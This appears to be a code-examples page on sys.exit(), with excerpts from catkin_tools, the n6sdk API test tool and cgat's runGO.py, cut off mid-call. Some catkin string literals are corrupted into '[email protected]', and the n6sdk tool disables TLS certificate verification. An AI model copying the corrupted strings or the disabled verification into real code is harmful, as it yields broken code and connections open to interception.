    if not no_deps:
        # Extend packages to be built to include their deps
        packages_to_be_built.extend(packages_to_be_built_deps)

    # Also re-sort
    try:
        packages_to_be_built = topological_order_packages(dict(packages_to_be_built))
    except AttributeError:
        log(clr("[build] @[email protected]{rf}Error:@| The workspace packages have a circular "
                "dependency, and cannot be built. Please run `catkin list "
                "--deps` to determine the problematic package(s)."))
        return

    # Check the number of packages to be built
    if len(packages_to_be_built) == 0:
        log(clr('[build] No packages to be built.'))

    # Assert start_with package is in the workspace
    verify_start_with_option(
        start_with,
        packages,
        all_packages,
        packages_to_be_built + packages_to_be_built_deps)

    # Populate .catkin file if we're not installing
    # NOTE: This is done to prevent the Catkin CMake code from doing it,
    # which isn't parallel-safe. Catkin CMake only modifies this file if
    # its package source path isn't found.
    if not context.install:
        dot_catkin_file_path = os.path.join(context.devel_space_abs, '.catkin')
        # If the file exists, get the current paths
        if os.path.exists(dot_catkin_file_path):
            dot_catkin_paths = open(dot_catkin_file_path, 'r').read().split(';')
        else:
            dot_catkin_paths = []

        # Update the list with the new packages (in topological order)
        packages_to_be_built_paths = [
            os.path.join(context.source_space_abs, path)
            for path, pkg in packages_to_be_built
        ]

        new_dot_catkin_paths = [
            os.path.join(context.source_space_abs, path)
            for path in [os.path.join(context.source_space_abs, path) for path, pkg in all_packages]
            if path in dot_catkin_paths or path in packages_to_be_built_paths
        ]

        # Write the new file if it's different, otherwise, leave it alone
        if dot_catkin_paths == new_dot_catkin_paths:
            wide_log("[build] Package table is up to date.")
        else:
            wide_log("[build] Updating package table.")
            open(dot_catkin_file_path, 'w').write(';'.join(new_dot_catkin_paths))

    # Remove packages before start_with
    if start_with is not None:
        for path, pkg in list(packages_to_be_built):
            if pkg.name != start_with:
                wide_log(clr("@[email protected]{pf}[email protected]|  @{gf}[email protected]| @{cf}{}@|").format(pkg.name))
                packages_to_be_built.pop(0)
            else:
                break

    # Get the names of all packages to be built
    packages_to_be_built_names = [p.name for _, p in packages_to_be_built]
    packages_to_be_built_deps_names = [p.name for _, p in packages_to_be_built_deps]

    # Generate prebuild and prebuild clean jobs, if necessary
    prebuild_jobs = {}
    setup_util_present = os.path.exists(os.path.join(context.devel_space_abs, '_setup_util.py'))
    catkin_present = 'catkin' in (packages_to_be_built_names + packages_to_be_built_deps_names)
    catkin_built = 'catkin' in built_packages
    prebuild_built = 'catkin_tools_prebuild' in built_packages

    # Handle the prebuild jobs if the develspace is linked
    prebuild_pkg_deps = []
    if context.link_devel:
        prebuild_pkg = None

        # Construct a dictionary to lookup catkin package by name
        pkg_dict = dict([(pkg.name, (pth, pkg)) for pth, pkg in all_packages])

        if setup_util_present:
            # Setup util is already there, determine if it needs to be
            # regenerated
            if catkin_built:
                if catkin_present:
                    prebuild_pkg_path, prebuild_pkg = pkg_dict['catkin']
            elif prebuild_built:
                if catkin_present:
                    # TODO: Clean prebuild package
                    ct_prebuild_pkg_path = get_prebuild_package(
                        context.build_space_abs, context.devel_space_abs, force_cmake)
                    ct_prebuild_pkg = parse_package(ct_prebuild_pkg_path)

                    prebuild_jobs['catkin_tools_prebuild'] = create_catkin_clean_job(
                        context,
                        ct_prebuild_pkg,
                        ct_prebuild_pkg_path,
                        dependencies=[],
                        dry_run=False,
                        clean_build=True,
                        clean_devel=True,
                        clean_install=True)

                    # TODO: Build catkin package
                    prebuild_pkg_path, prebuild_pkg = pkg_dict['catkin']
                    prebuild_pkg_deps.append('catkin_tools_prebuild')
            else:
                # How did these get here??
                log("Warning: devel space setup files have an unknown origin.")
        else:
            # Setup util needs to be generated
            if catkin_built or prebuild_built:
                log("Warning: generated devel space setup files have been deleted.")

            if catkin_present:
                # Build catkin package
                prebuild_pkg_path, prebuild_pkg = pkg_dict['catkin']
            else:
                # Generate and build an explicit prebuild package
                prebuild_pkg_path = get_prebuild_package(context.build_space_abs, context.devel_space_abs, force_cmake)
                prebuild_pkg = parse_package(prebuild_pkg_path)

        if prebuild_pkg is not None:
            # Create the prebuild job
            prebuild_job = create_catkin_build_job(
                context,
                prebuild_pkg,
                prebuild_pkg_path,
                dependencies=prebuild_pkg_deps,
                force_cmake=force_cmake,
                pre_clean=pre_clean,
                prebuild=True)

            # Add the prebuild job
            prebuild_jobs[prebuild_job.jid] = prebuild_job

    # Remove prebuild jobs from normal job list
    for prebuild_jid, prebuild_job in prebuild_jobs.items():
        if prebuild_jid in packages_to_be_built_names:
            packages_to_be_built_names.remove(prebuild_jid)

    # Initial jobs list is just the prebuild jobs
    jobs = [] + list(prebuild_jobs.values())

    # Get all build type plugins
    build_job_creators = {
        ep.name: ep.load()['create_build_job']
        for ep in pkg_resources.iter_entry_points(group='catkin_tools.jobs')
    }

    # It's a problem if there aren't any build types available
    if len(build_job_creators) == 0:
        sys.exit('Error: No build types available. Please check your catkin_tools installation.')

    # Construct jobs
    for pkg_path, pkg in all_packages:
        if pkg.name not in packages_to_be_built_names:
            continue

        # Ignore metapackages
        if 'metapackage' in [e.tagname for e in pkg.exports]:
            continue

        # Get actual execution deps
        deps = [
            p.name for _, p
            in get_cached_recursive_build_depends_in_workspace(pkg, packages_to_be_built)
            if p.name not in prebuild_jobs
        ]
        # All jobs depend on the prebuild jobs if they're defined
        if not no_deps:
            for j in prebuild_jobs.values():
                deps.append(j.jid)

        # Determine the job parameters
        build_job_kwargs = dict(
            context=context,
            package=pkg,
            package_path=pkg_path,
            dependencies=deps,
            force_cmake=force_cmake,
            pre_clean=pre_clean)

        # Create the job based on the build type
        build_type = get_build_type(pkg)

        if build_type in build_job_creators:
            jobs.append(build_job_creators[build_type](**build_job_kwargs))
        else:
            wide_log(clr(
                "[build] @[email protected]{yf}Warning:@| Skipping package `{}` because it "
                "has an unsupported package build type: `{}`"
            ).format(pkg.name, build_type))

            wide_log(clr("[build] Note: Available build types:"))
            for bt_name in build_job_creators.keys():
                wide_log(clr("[build]  - `{}`".format(bt_name)))

    # Queue for communicating status
    event_queue = Queue()

    try:
        # Spin up status output thread
        status_thread = ConsoleStatusController(
            'build',
            ['package', 'packages'],
            jobs,
            n_jobs,
            [pkg.name for _, pkg in context.packages],
            [p for p in context.whitelist],
            [p for p in context.blacklist],
            event_queue,
            show_notifications=not no_notify,
            show_active_status=not no_status,
            show_buffered_stdout=not quiet and not interleave_output,
            show_buffered_stderr=not interleave_output,
            show_live_stdout=interleave_output,
            show_live_stderr=interleave_output,
            show_stage_events=not quiet,
            show_full_summary=(summarize_build is True),
            pre_start_time=pre_start_time,
            active_status_rate=limit_status_rate)
        status_thread.start()

        # Initialize locks
        locks = {
            'installspace': asyncio.Lock() if lock_install else FakeLock()
        }

        # Block while running N jobs asynchronously
        try:
            all_succeeded = run_until_complete(execute_jobs(
                'build',
                jobs,
                locks,
                event_queue,
                context.log_space_abs,
                max_toplevel_jobs=n_jobs,
                continue_on_failure=continue_on_failure,
                continue_without_deps=False))
        except Exception:
            status_thread.keep_running = False
            all_succeeded = False
            status_thread.join(1.0)
            wide_log(str(traceback.format_exc()))

        status_thread.join(1.0)

        # Warn user about new packages
        now_built_packages, now_unbuilt_pkgs = get_built_unbuilt_packages(context, workspace_packages)
        new_pkgs = [p for p in unbuilt_pkgs if p not in now_unbuilt_pkgs]
        if len(new_pkgs) > 0:
            log(clr("[build] @/@!Note:@| @/Workspace packages have changed, "
                    "please re-source setup files to use [email protected]|"))

        if all_succeeded:
            # Create isolated devel setup if necessary
            if context.isolate_devel:
                if not context.install:
                    _create_unmerged_devel_setup(context, now_unbuilt_pkgs)
                else:
                    _create_unmerged_devel_setup_for_install(context)
            return 0
        else:
            return 1

    except KeyboardInterrupt:
        wide_log("[build] Interrupted by user!")
        event_queue.put(None)
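
Example 23 leans on the fact that sys.exit() accepts any object: a string argument is printed to stderr and the interpreter exits with status 1, which is why catkin_tools can exit with a fully formatted (and colorized) error message in a single call. A small sketch of that behaviour is below; validate_rate is an illustrative name, not catkin_tools API.

import sys


def validate_rate(limit_status_rate):
    """Reject negative rates in the same style as build_isolated_workspace."""
    if limit_status_rate < 0:
        # sys.exit(<str>) prints the message to stderr and exits with status 1;
        # sys.exit(<int>) uses the integer itself as the exit status.
        sys.exit("Error: The value of --status-rate must be greater than or equal to zero.")


try:
    validate_rate(-1)
except SystemExit as exc:
    # sys.exit() just raises SystemExit, so it can be intercepted if needed;
    # exc.code holds whatever argument was passed to sys.exit().
    print("exit argument was: %r" % exc.code)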

Example 24

Project: n6sdk
Source File: api_test_tool.py
View license
def main():
    requests.packages.urllib3.disable_warnings()  # to turn off InsecureRequestWarning

    parser = argparse.ArgumentParser()
    excl_args = parser.add_mutually_exclusive_group(required=True)
    excl_args.add_argument(
        '--generate-config',
        action='store_true',
        help='generate the config file template, then exit')
    excl_args.add_argument(
        '-c', '--config',
        help='test an n6-like API using the specified config file')
    parser.add_argument(
        '-v', '--verbose',
        action='store_true',
        help='be more descriptive')
    args = parser.parse_args()

    if args.generate_config:
        for line in get_config_base_lines():
            print line  # using OS-specific newlines
        sys.exit(0)

    config_handler, config = get_config(args.config)

    # Preparing stuff
    ca_cert = config.get('cert_path', None)
    ca_key = config.get('key_path', None)
    base_url = get_base_url(config.get('base_url'))
    constant_params_list = config_handler.options('constant_params')
    constant_params = dict((item, config.get(item)) for item in constant_params_list)

    report = Report()
    ds_test = DataSpecTest()
    client = APIClient(ca_cert, ca_key, verify=False)

    #
    # Testing basic search url response and data_spec compatibility
    #

    report.section("Testing basic search query. Getting representative data sample", 1)
    data_url = make_url(base_url, constant_params)

    # Prepare data range sets for each key of returned json objects
    data_range = defaultdict(set)
    composed_keys = set([u'address', u'client', u'injects'])
    additional_attributes = set([])

    report.info('Inferring data structure model + testing basic compliance', 1)
    if args.verbose:
        report.info('Testing URL: "{}"'.format(data_url), 1)
    try:
        response = client.get_stream(data_url)
        for data in response:
            for key, val in data.viewitems():
                if key in composed_keys:
                    val = cjson.encode(val)
                try:
                    data_range[key].add(val)
                except TypeError:
                    report.info(
                        "Additional composed items detected in API response: {}".format(key), 1)

                ds_test.validate_data_format(data)
                if args.verbose:
                    report.info("OK, proper result item", 1)

            # test for n6-specific keys
            nonstandard_keys = ds_test.get_nonstandard_fields(data)
            for key in nonstandard_keys:
                additional_attributes.add(key)

        report.info("Non-standard keys found: {}".format(
            ", ".join(
                '"{}"'.format(k)
                for k in sorted(additional_attributes))), 1)
        report.info("Returned data seems to be properly formatted", 1)

    except APIClientException as e:
        sys.exit("FATAL ERROR: {}".format(e))
    except APIValidatorException as e:
        report.error("Data validation error: {}".format(e), 1)

    #
    # Make request with legal params
    #

    report.section("Testing a query with two random LEGAL params", 2)
    MAX_RETRY = 100
    optional_params_keys = set(data_range.viewkeys()) - set(constant_params)
    optional_params_keys = ds_test.all_param_keys.intersection(optional_params_keys)
    for i in xrange(MAX_RETRY):
        rand_keys = random.sample(optional_params_keys, 2)
        rand_vals = (random.sample(data_range[val], 1)[0] for val in rand_keys)
        optional_params = dict(zip(rand_keys, rand_vals))
        legal_query_url = make_url(base_url, constant_params, optional_params)
        test_legal_ok = True
        try:
            filtered_legal = client.get_stream(legal_query_url)
            something_processed = False
            for record in filtered_legal:
                if not something_processed:
                    something_processed = True
                    if args.verbose:
                        report.info('Testing URL: "{}"'.format(legal_query_url), 2)
                for key, val in record.viewitems():
                    if key in optional_params and val != optional_params[key]:
                        report.error('Wrong filtering result with query: {}'.format(
                            optional_params), 2)
                    else:
                        if args.verbose:
                            report.info('OK, proper result item', 2)
            if something_processed:
                break
        except APIClientException as e:
            test_legal_ok = False
            report.error("Connection exception: {}".format(e), 2)
            break
    if not something_processed:
        report.error("Could not pick any pair of random legal keys", 2)
    elif test_legal_ok:
        report.info("Filtering seems to work as expected", 2)

    #
    # Make request with illegal params
    #

    report.section("Testing queries with ILLEGAL params", 3)
    illegal_query_urls = []
    illegal_keys = data_range.viewkeys() - ds_test.all_param_keys - composed_keys
    illegal_keys = illegal_keys.difference(additional_attributes)
    illegal_vals = (random.sample(data_range[val], 1)[0] for val in illegal_keys)
    illegal_params = dict(zip(illegal_keys, illegal_vals))

    for key, val in illegal_params.viewitems():
        illegal_query_urls.append(make_url(base_url, constant_params, {key: val}))

    test_illegal_ok = True
    for illegal in illegal_query_urls:
        if args.verbose:
            report.info('Testing illegal URL: "{}"'.format(illegal), 3)
        try:
            filtered_illegal = client.get_stream(illegal)
            for record in filtered_illegal:
                pass
            code = client.status()
        except APIClientException as e:
            code = getattr(e, 'code', None)
        if code == requests.codes.bad_request:
            if args.verbose:
                report.info("OK, proper behaviour: {}".format(e), 3)
        else:
            test_illegal_ok = False
            if code is None:
                report.error("Connection exception: {}".format(e), 3)
            else:
                report.error("Wrong response code: {}, should be: 400 (Bad Request).".format(
                    code), 3)
    if test_illegal_ok:
        report.info("Query validation seems to work as expected", 3)

    #
    # Make request with legal all single params
    #

    report.section("Testing queries with all single LEGAL params", 4)
    MINIMUM_VALUE_NUMBER = 3
    keys_list = []
    test_single_legal_ok = True
    for optional_key in optional_params_keys:
        if len(data_range[optional_key]) >= MINIMUM_VALUE_NUMBER:
            keys_list.append(optional_key)
        rand_val = random.sample(data_range[optional_key], 1)[0]
        opt_param = {optional_key: rand_val}
        legal_query_url = (make_url(base_url, constant_params, opt_param))
        if args.verbose:
            report.info('Testing URL: "{}"'.format(legal_query_url), 4)
        try:
            filtered_legal = client.get_stream(legal_query_url)
            for record in filtered_legal:
                for key, val in record.viewitems():
                    if key in opt_param and val != opt_param[key]:
                        report.error('Wrong filtering result with query: {}'.format(
                            opt_param), 4)
                    else:
                        if args.verbose:
                            report.info('OK, proper result item', 4)
        except APIClientException as err:
            test_single_legal_ok = False
            report.error("Connection exception: {}".format(err), 4)
    if test_single_legal_ok:
        report.info("Filtering seems to work as expected", 4)

    #
    # Make request with legal list params
    #

    report.section("Testing queries with a LEGAL param, using different values", 5)
    test_key = random.choice(keys_list)
    random_val_list = random.sample(data_range[test_key], MINIMUM_VALUE_NUMBER)
    test_list_legal_ok = True
    for test_value in random_val_list:
        opt_param = {test_key: test_value}
        legal_query_url = (make_url(base_url, constant_params, opt_param))
        if args.verbose:
            report.info('Testing URL: "{}"'.format(legal_query_url), 5)
        try:
            filtered_legal = client.get_stream(legal_query_url)
            for record in filtered_legal:
                for key, val in record.viewitems():
                    if key in opt_param and val != opt_param[key]:
                        report.error('Wrong filtering result with query: {}'.format(
                            opt_param), 5)
                    else:
                        if args.verbose:
                            report.info('OK, proper result item', 5)
        except APIClientException as err:
            test_list_legal_ok = False
            report.error("Connection exception: {}".format(err), 5)
    if test_list_legal_ok:
        report.info("Filtering seems to work as expected", 5)

    report.show()

    if report.has_errors():
        sys.exit(1)
    else:
        sys.exit(0)
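
Example 24 finishes by translating the test report into a process exit status: 0 when the run was clean, 1 when any error was recorded, so shell scripts and CI jobs can branch on the result. A minimal sketch of that convention, using illustrative names:

import sys


def finish(errors):
    """Exit 0 on a clean run, 1 if any errors were collected."""
    for err in errors:
        print("ERROR: %s" % err)
    sys.exit(1 if errors else 0)


if __name__ == '__main__':
    finish([])  # a clean run exits with status 0

In a shell, the resulting status can then be checked with echo $? or used directly in && / || chains.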

Example 25

Project: cgat
Source File: runGO.py
View license
def main(argv=None):

    parser = E.OptionParser(
        version="%prog version: $Id$",
        usage=globals()["__doc__"])

    parser.add_option(
        "-s", "--species", dest="species", type="string",
        help="species to use [default=%default].")

    parser.add_option(
        "-i", "--slims", dest="filename_slims", type="string",
        help="filename with GO SLIM categories "
        "[default=%default].")

    parser.add_option(
        "-g", "--genes-tsv-file", dest="filename_genes", type="string",
        help="filename with genes to analyse "
        "[default=%default].")

    parser.add_option(
        "-b", "--background-tsv-file", dest="filename_background",
        type="string",
        help="filename with background genes to analyse "
        "[default=%default].")

    parser.add_option(
        "-m", "--min-counts", dest="minimum_counts",
        type="int",
        help="minimum count - ignore all categories that have "
        "fewer than # number of genes"
        " [default=%default].")

    parser.add_option(
        "-o", "--sort-order", dest="sort_order", type="choice",
        choices=("fdr", "pvalue", "ratio"),
        help="output sort order [default=%default].")

    parser.add_option(
        "--ontology", dest="ontology", type="string",
        action="append",
        help="go ontologies to analyze. Ontologies are tested "
        "separately [default=%default].")

    parser.add_option(
        "-t", "--threshold", dest="threshold", type="float",
        help="significance threshold [>1.0 = all ]. If --fdr is set, this "
        "refers to the fdr, otherwise it is a cutoff for p-values.")

    parser.add_option(
        "--filename-dump", dest="filename_dump", type="string",
        help="dump GO category assignments into a flatfile "
        "[default=%default].")

    parser.add_option(
        "--gene2name-map-tsv-file", dest="filename_gene2name", type="string",
        help="optional filename mapping gene identifiers to gene names "
        "[default=%default].")

    parser.add_option(
        "--filename-ontology", dest="filename_ontology", type="string",
        help="filename with ontology in OBO format [default=%default].")

    parser.add_option(
        "--filename-input", dest="filename_input", type="string",
        help="read GO category assignments from a flatfile "
        "[default=%default].")

    parser.add_option(
        "--sample-size", dest="sample", type="int",
        help="do sampling (with # samples) [default=%default].")

    parser.add_option(
        "--filename-output-pattern", "--output-filename-pattern",
        dest="output_filename_pattern", type="string",
        help="pattern with output filename pattern "
        "(should contain: %(go)s and %(section)s ) [default=%default]")

    parser.add_option(
        "--fdr", dest="fdr", action="store_true",
        help="calculate and filter by FDR default=%default].")

    parser.add_option(
        "--go2goslim", dest="go2goslim", action="store_true",
        help="convert go assignments in STDIN to goslim assignments and "
        "write to STDOUT [default=%default].")

    parser.add_option(
        "--gene-pattern", dest="gene_pattern", type="string",
        help="pattern to transform identifiers to GO gene names "
        "[default=%default].")

    parser.add_option(
        "--filename-map-slims", dest="filename_map_slims", type="string",
        help="write mapping between GO categories and GOSlims "
        "[default=%default].")

    parser.add_option(
        "--get-genes", dest="get_genes", type="string",
        help="list all genes in the with a certain GOID [default=%default].")

    parser.add_option(
        "--strict", dest="strict", action="store_true",
        help="require all genes in foreground to be part of background. "
        "If not set, genes in foreground will be added to the background "
        "[default=%default].")

    parser.add_option(
        "-q", "--fdr-method", dest="qvalue_method", type="choice",
        choices=("empirical", "storey", "BH"),
        help="method to perform multiple testing correction by controlling "
        "the fdr [default=%default].")

    parser.add_option(
        "--pairwise", dest="compute_pairwise", action="store_true",
        help="compute pairwise enrichment for multiple gene lists. "
        "[default=%default].")

    # parser.add_option( "--fdr-lambda", dest="qvalue_lambda", type="float",
    #                   help="fdr computation: lambda [default=%default]."  )

    # parser.add_option( "--qvalue-pi0-method", dest="qvalue_pi0_method", type="choice",
    #                    choices = ("smoother", "bootstrap" ),
    # help="fdr computation: method for estimating pi0 [default=%default]."  )

    parser.set_defaults(species=None,
                        filename_genes="-",
                        filename_background=None,
                        filename_slims=None,
                        minimum_counts=0,
                        ontology=[],
                        filename_dump=None,
                        sample=0,
                        fdr=False,
                        output_filename_pattern=None,
                        threshold=0.05,
                        filename_map_slims=None,
                        gene_pattern=None,
                        sort_order="ratio",
                        get_genes=None,
                        strict=False,
                        qvalue_method="empirical",
                        pairs_min_observed_counts=3,
                        compute_pairwise=False,
                        filename_gene2name=None
                        )

    (options, args) = E.Start(parser, add_database_options=True)

    if options.go2goslim:
        GO.convertGo2Goslim(options)
        E.Stop()
        sys.exit(0)

    if options.fdr and options.sample == 0:
        E.warn("fdr will be computed without sampling")

    #############################################################
    # dump GO
    if options.filename_dump:
        # set default ontologies to GO
        if not options.ontology:
            options.ontology = [
                "biol_process", "mol_function", "cell_location"]

        E.info("dumping GO categories to %s" % (options.filename_dump))

        dbhandle = connectToEnsembl(options)

        outfile = IOTools.openFile(options.filename_dump, "w", create_dir=True)
        GO.DumpGOFromDatabase(outfile,
                              dbhandle,
                              options)
        outfile.close()
        E.Stop()
        sys.exit(0)

    #############################################################
    # read GO categories from file
    if options.filename_input:
        E.info("reading association of categories and genes from %s" %
               (options.filename_input))
        infile = IOTools.openFile(options.filename_input)
        gene2gos, go2infos = GO.ReadGene2GOFromFile(infile)
        infile.close()

    if options.filename_gene2name:
        E.info("reading gene identifier to gene name mapping from %s" %
               options.filename_gene2name)
        infile = IOTools.openFile(options.filename_gene2name)
        gene2name = IOTools.readMap(infile, has_header=True)
        infile.close()
        E.info("read %i gene names for %i gene identifiers" %
               (len(set(gene2name.values())),
                len(gene2name)))
    else:
        # use identity mapping
        gene2name = dict([(x, x) for x in list(gene2gos.keys())])

    #############################################################
    # read GO ontology from file
    if options.filename_ontology:
        E.info("reading ontology from %s" % (options.filename_ontology))

        infile = IOTools.openFile(options.filename_ontology)
        ontology = GO.readOntology(infile)
        infile.close()

        def _g():
            return collections.defaultdict(GO.GOInfo)
        go2infos = collections.defaultdict(_g)

        # substitute go2infos
        for go in list(ontology.values()):
            go2infos[go.mNameSpace][go.mId] = GO.GOInfo(
                go.mId,
                go_type=go.mNameSpace,
                description=go.mName)

    #############################################################
    # get foreground gene list
    input_foreground, genelists = GO.ReadGeneLists(
        options.filename_genes,
        gene_pattern=options.gene_pattern)

    E.info("read %i genes for forground in %i gene lists" %
           (len(input_foreground), len(genelists)))

    #############################################################
    # get background
    if options.filename_background:

        # nick - bug fix: background is the first tuple element from
        # ReadGeneLists
        input_background = GO.ReadGeneLists(
            options.filename_background,
            gene_pattern=options.gene_pattern)[0]
        E.info("read %i genes for background" % len(input_background))
    else:
        input_background = None

    #############################################################
    # sort out which ontologies to test
    if not options.ontology:
        if options.filename_input:
            options.ontology = list(gene2gos.keys())

    E.info("found %i ontologies: %s" %
           (len(options.ontology), options.ontology))

    summary = []
    summary.append("\t".join((
        "genelist",
        "ontology",
        "significant",
        "threshold",
        "ngenes",
        "ncategories",
        "nmaps",
        "nforegound",
        "nforeground_mapped",
        "nbackground",
        "nbackground_mapped",
        "nsample_counts",
        "nbackground_counts",
        "psample_assignments",
        "pbackground_assignments",
        "messages")) + "\n")

    #############################################################
    # get go categories for genes
    for test_ontology in sorted(options.ontology):

        # store results for aggregate output of multiple gene lists
        all_results = []
        all_significant_results = []
        all_genelists_with_results = []

        E.info("working on ontology %s" % test_ontology)
        #############################################################
        # get/read association of GO categories to genes
        if options.filename_input:
            gene2go, go2info = gene2gos[test_ontology], go2infos[test_ontology]
        else:
            E.info("reading data from database ...")

            dbhandle.Connect(options)
            gene2go, go2info = GO.ReadGene2GOFromDatabase(
                dbhandle,
                test_ontology,
                options.database, options.species)

            E.info("finished")

        if len(go2info) == 0:
            E.warn(
                "could not find information for terms - "
                "could be mismatch between ontologies")

        ngenes, ncategories, nmaps, counts_per_category = GO.CountGO(gene2go)
        E.info("assignments found: %i genes mapped to %i categories "
               "(%i maps)" %
               (ngenes, ncategories, nmaps))

        if options.minimum_counts > 0:
            to_remove = set(
                [x for x, y in counts_per_category.items()
                 if y < options.minimum_counts])
            E.info("removing %i categories with less than %i genes" %
                   (len(to_remove), options.minimum_counts))
            GO.removeCategories(gene2go, to_remove)

            ngenes, ncategories, nmaps, counts_per_category = \
                GO.CountGO(gene2go)
            E.info("assignments after filtering: %i genes mapped "
                   "to %i categories (%i maps)" % (
                       ngenes, ncategories, nmaps))

        for genelist_name, foreground in sorted(genelists.items()):

            msgs = []
            E.info("processing %s with %i genes" %
                   (genelist_name, len(foreground)))
            ##################################################################
            ##################################################################
            ##################################################################
            # build background - reconcile with foreground
            ##################################################################
            if input_background is None:
                background = list(gene2go.keys())
            else:
                background = list(input_background)

            # nick - bug-fix: background included the foreground in a tuple;
            # background is the first tuple element
            missing = foreground.difference(set(background))

            if options.strict:
                assert len(missing) == 0, \
                    "%i genes in foreground but not in background: %s" % (
                        len(missing), str(missing))
            else:
                if len(missing) != 0:
                    E.warn("%i genes in foreground that are not in "
                           "background - added to background of %i" %
                           (len(missing), len(background)))

                background.extend(missing)

            E.info("(unfiltered) foreground=%i, background=%i" %
                   (len(foreground), len(background)))

            # sort foreground and background, important for reproducibility
            # under random seed
            foreground = sorted(foreground)
            background = sorted(background)

            #############################################################
            # sanity checks:
            # are all of the foreground genes in the dataset
            # missing = set(genes).difference( set(gene2go.keys()) )
            # assert len(missing) == 0, "%i genes in foreground set without GO annotation: %s" % (len(missing), str(missing))

            #############################################################
            # read GO slims and map GO categories to GO slim categories
            if options.filename_slims:
                go_slims = GO.GetGOSlims(
                    IOTools.openFile(options.filename_slims, "r"))

                if options.loglevel >= 1:
                    v = set()
                    for x in list(go_slims.values()):
                        for xx in x:
                            v.add(xx)
                    options.stdlog.write(
                        "# read go slims from %s: go=%i, slim=%i\n" %
                        (options.filename_slims,
                         len(go_slims),
                         len(v)))

                if options.filename_map_slims:
                    if options.filename_map_slims == "-":
                        outfile = options.stdout
                    else:
                        outfile = IOTools.openFile(
                            options.filename_map_slims, "w")

                    outfile.write("GO\tGOSlim\n")
                    for go, go_slim in sorted(list(go_slims.items())):
                        outfile.write("%s\t%s\n" % (go, go_slim))

                    if outfile != options.stdout:
                        outfile.close()

                gene2go = GO.MapGO2Slims(gene2go, go_slims, ontology=ontology)

                if options.loglevel >= 1:
                    ngenes, ncategories, nmaps, counts_per_category = \
                        GO.CountGO(gene2go)
                    options.stdlog.write(
                        "# after go slim filtering: %i genes mapped to "
                        "%i categories (%i maps)\n" % (
                            ngenes, ncategories, nmaps))

            #############################################################
            # Just dump out the gene list
            if options.get_genes:
                fg, bg, ng = [], [], []

                for gene, vv in list(gene2go.items()):
                    for v in vv:
                        if v.mGOId == options.get_genes:
                            if gene in foreground:
                                fg.append(gene)
                            elif gene in background:
                                bg.append(gene)
                            else:
                                ng.append(gene)

                # skip to next GO class
                if not (bg or ng):
                    continue

                options.stdout.write(
                    "# genes in GO category %s\n" % options.get_genes)
                options.stdout.write("gene\tset\n")
                for x in sorted(fg):
                    options.stdout.write("%s\t%s\n" % ("fg", x))
                for x in sorted(bg):
                    options.stdout.write("%s\t%s\n" % ("bg", x))
                for x in sorted(ng):
                    options.stdout.write("%s\t%s\n" % ("ng", x))

                E.info("nfg=%i, nbg=%i, nng=%i" % (len(fg), len(bg), len(ng)))

                E.Stop()
                sys.exit(0)

            #############################################################
            outfile = GO.getFileName(options,
                                     go=test_ontology,
                                     section='foreground',
                                     set=genelist_name)

            outfile.write("gene_id\n%s\n" % ("\n".join(sorted(foreground))))
            if options.output_filename_pattern:
                outfile.close()

            outfile = GO.getFileName(options,
                                     go=test_ontology,
                                     section='background',
                                     set=genelist_name)

            # Jethro bug fix - see section 'build background' for assignment
            outfile.write("gene_id\n%s\n" % ("\n".join(sorted(background))))
            if options.output_filename_pattern:
                outfile.close()

            #############################################################
            # do the analysis
            go_results = GO.AnalyseGO(gene2go, foreground, background)

            if len(go_results.mSampleGenes) == 0:
                E.warn("%s: no genes with GO categories - analysis aborted" %
                       genelist_name)
                continue

            pairs = list(go_results.mResults.items())

            #############################################################
            # calculate fdr for each hypothesis
            if options.fdr:
                fdrs, samples, method = GO.computeFDRs(go_results,
                                                       foreground,
                                                       background,
                                                       options,
                                                       test_ontology,
                                                       gene2go,
                                                       go2info)
                for x, v in enumerate(pairs):
                    v[1].mQValue = fdrs[v[0]][0]
            else:
                fdrs, samples, method = {}, {}, None

            msgs.append("fdr=%s" % method)

            if options.sort_order == "fdr":
                pairs.sort(key=lambda x: x[1].mQValue)
            elif options.sort_order == "ratio":
                pairs.sort(key=lambda x: x[1].mRatio)
            elif options.sort_order == "pvalue":
                pairs.sort(key=lambda x: x[1].mPValue)

            #############################################################
            #############################################################
            #############################################################
            # output the full result
            outfile = GO.getFileName(options,
                                     go=test_ontology,
                                     section='overall',
                                     set=genelist_name)

            GO.outputResults(
                outfile, pairs, go2info, options, fdrs=fdrs, samples=samples)

            if options.output_filename_pattern:
                outfile.close()

            #############################################################
            #############################################################
            #############################################################
            # filter significant results and output
            filtered_pairs = GO.selectSignificantResults(pairs, fdrs, options)

            nselected = len(filtered_pairs)
            nselected_up = len([x for x in filtered_pairs if x[1].mRatio > 1])
            nselected_down = len(
                [x for x in filtered_pairs if x[1].mRatio < 1])

            assert nselected_up + nselected_down == nselected

            outfile = GO.getFileName(options,
                                     go=test_ontology,
                                     section='results',
                                     set=genelist_name)

            GO.outputResults(outfile,
                             filtered_pairs,
                             go2info,
                             options,
                             fdrs=fdrs,
                             samples=samples)

            if options.output_filename_pattern:
                outfile.close()

            #############################################################
            #############################################################
            #############################################################
            # save results for multi-gene-list analysis
            all_results.append(pairs)
            all_significant_results.append(filtered_pairs)
            all_genelists_with_results.append(genelist_name)

            #############################################################
            #############################################################
            #############################################################
            # output parameters
            ngenes, ncategories, nmaps, counts_per_category = \
                GO.CountGO(gene2go)

            outfile = GO.getFileName(options,
                                     go=test_ontology,
                                     section='parameters',
                                     set=genelist_name)

            nbackground = len(background)
            if nbackground == 0:
                nbackground = len(go_results.mBackgroundGenes)

            outfile.write(
                "# input go mappings for gene list '%s' and category '%s'\n" %
                (genelist_name, test_ontology))
            outfile.write("parameter\tvalue\tdescription\n")
            outfile.write("mapped_genes\t%i\tmapped genes\n" % ngenes)
            outfile.write(
                "mapped_categories\t%i\tmapped categories\n" % ncategories)
            outfile.write("mappings\t%i\tmappings\n" % nmaps)
            outfile.write("genes_in_fg\t%i\tgenes in foreground\n" %
                          len(foreground))
            outfile.write(
                "genes_in_fg_with_assignment\t%i\tgenes in foreground with GO assignments\n" %
                (len(go_results.mSampleGenes)))
            outfile.write(
                "genes_in_bg\t%i\tinput background\n" % nbackground)
            outfile.write(
                "genes_in_bg_with_assignment\t%i\tgenes in background with GO assignments\n" % (
                len(go_results.mBackgroundGenes)))
            outfile.write(
                "associations_in_fg\t%i\tassociations in sample\n" %
                go_results.mSampleCountsTotal)
            outfile.write(
                "associations_in_bg\t%i\tassociations in background\n" %
                go_results.mBackgroundCountsTotal)
            outfile.write(
                "percent_genes_in_fg_with_association\t%s\tpercent genes in sample with GO assignments\n" % (
                    IOTools.prettyPercent(len(go_results.mSampleGenes),
                                          len(foreground), "%5.2f")))
            outfile.write(
